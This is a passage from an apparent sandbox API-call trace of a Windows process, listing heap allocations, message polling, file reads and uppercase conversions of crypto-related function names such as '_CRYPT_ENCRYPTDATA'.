lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0040.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0040.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0040.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.957] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0040.957] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.957] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0040.957] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.958] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.958] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0040.961] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10e, lpOverlapped=0x0) returned 1 [0040.961] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1010e) returned 0xac2018 [0040.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0040.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1010e) returned 0xad2130 [0040.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.963] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0040.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1010e) returned 0xac2018 [0040.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0040.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.964] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.964] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.964] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1010e) returned 0xac2018 [0040.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0040.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0040.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0040.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0040.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0040.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0040.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0040.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1010e) returned 0x935008 [0040.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0040.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.967] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.967] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0040.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0040.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.967] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da298 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.968] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0040.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.968] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.969] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.970] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0040.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0040.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.971] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 